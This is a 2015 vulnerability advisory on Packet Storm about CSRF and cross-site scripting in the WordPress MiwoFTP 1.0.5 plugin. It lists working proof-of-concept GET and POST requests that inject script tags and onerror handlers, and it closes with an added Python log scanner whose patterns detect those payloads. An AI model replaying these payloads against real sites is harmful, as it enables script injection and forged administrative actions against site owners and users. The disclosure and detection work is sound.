WordPress MiwoFTP 1.0.5 CSRF / Cross Site Scripting

2015-04-15T00:00:00
ID PACKETSTORM:131435
Type packetstorm
Reporter LiquidWorm
Modified 2015-04-15T00:00:00

Description

WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities  
  
  
Vendor: Miwisoft LLC  
Product web page: http://www.miwisoft.com  
Affected version: 1.0.5  
  
Summary: MiwoFTP is a smart, fast and lightweight file manager  
plugin that operates from the back-end of WordPress.  
  
Desc: The MiwoFTP WP plugin suffers from multiple cross-site request  
forgery (CSRF) and cross-site scripting (XSS) vulnerabilities. The application  
allows users to perform certain actions via HTTP requests without performing  
any validity checks (such as a nonce or referer check) to verify that the  
requests were intended. This can be exploited to perform certain actions with  
administrative privileges if a logged-in user visits a malicious web site.  
Input passed to several GET/POST parameters is not properly sanitised before  
being returned to the user. This can be exploited to execute arbitrary HTML  
and script code in a user's browser session in the context of an affected site.  
  
Tested on: Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5241  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5241.php  
  
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog  
  
  
24.03.2015  
  
--  
  
  
GET:  
(params: dir, item, order, srt)  
-------------------------------  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=list&dir=wp-content"><script>alert(1)</script>&order=name&srt=yes  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=wp-content%2Fuploads&item=test.php"><img%20src%3da%20onerror%3dalert(2)>&order=name&srt=yes  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name"><script>alert(3)</script>&srt=yes&searchitem=test&subdir=y  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes"><script>alert(4)</script>  
  
  
---  
  
  
POST:  
(params: code, fname, new_dir, newitems[], searchitem, selitems[])  
------------------------------------------------------------------  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes  
- dosave=yes&code="><script>alert(1)</script>&fname=test.php  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes  
- dosave=yes&code=1&fname=test.php"><img%20src%3da%20onerror%3dalert(2)>  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes  
- do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F1"><script>alert(3)</script>&selitems%5B%5D=test&newitems%5B%5D=test.php  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes  
- do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F2015&selitems%5B%5D=test&newitems%5B%5D=test.php"><script>alert(4)</script>  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes  
- searchitem=test"><script>alert(5)</script>&subdir=y  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=arch&dir=wp-content%2Fuploads&order=name&srt=yes  
- selitems%5B%5D=test.zip"><script>alert(6)</script>&name=test&type=zip  
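As an added defensive example (not part of the advisory), the script below scans Apache combined-format access log lines for MiwoFTP admin requests whose reflected GET parameters (the `dir`, `item`, `order`, `srt` and `searchitem` parameters listed above) carry markup. The log lines are constructed for illustration; POST bodies do not appear in ordinary access logs, so only the query string is inspected.

```python
import re
from urllib.parse import urlsplit, parse_qs

# GET parameters the advisory reports as reflected without escaping.
REFLECTED_PARAMS = {"dir", "item", "order", "srt", "searchitem"}
# Characters/tokens that should never appear in a directory name, file name or sort flag.
MARKUP_RE = re.compile(r'[<>"]|javascript:|\bon\w+\s*=', re.IGNORECASE)
# Apache combined log format: client, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (payloads percent-encoded as a browser would send them).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Mar/2015:10:01:12 +0100] "GET /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=list&dir=wp-content%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=name&srt=yes HTTP/1.1" 200 5123',
    '203.0.113.7 - - [24/Mar/2015:10:01:30 +0100] "GET /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=list&dir=wp-content%2Fuploads&order=name&srt=yes HTTP/1.1" 200 4871',
    '198.51.100.2 - - [24/Mar/2015:10:02:05 +0100] "GET /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes%22%3E%3Cscript%3Ealert(4)%3C/script%3E HTTP/1.1" 200 3990',
    '198.51.100.2 - - [24/Mar/2015:10:02:40 +0100] "GET /wordpress/wp-admin/admin.php?page=other&dir=%3Cscript%3E HTTP/1.1" 200 100',
]

def is_miwoftp_request(target):
    """True when the request targets the MiwoFTP admin page (admin.php?page=miwoftp)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return False
    return parse_qs(parts.query).get("page") == ["miwoftp"]

def suspicious_params(target):
    """Return {param: decoded_value} for reflected parameters that contain markup."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)  # percent-decodes values
    hits = {}
    for name in sorted(REFLECTED_PARAMS):
        for value in qs.get(name, []):
            if MARKUP_RE.search(value):
                hits[name] = value
    return hits

def scan(lines):
    """Yield (client_ip, method, {param: value}) for each MiwoFTP request carrying markup."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_miwoftp_request(m["target"]):
            continue
        hits = suspicious_params(m["target"])
        if hits:
            findings.append((m["ip"], m["method"], hits))
    return findings

if __name__ == "__main__":
    for ip, method, hits in scan(SAMPLE_LOG):
        print(f"{ip} {method} reflected-markup params: {hits}")
```

Percent-decoding is done once by `parse_qs`; a request that is double-encoded to evade this check would also reach the plugin double-encoded, so extend the decoding step only if the deployment's rewrite rules decode twice.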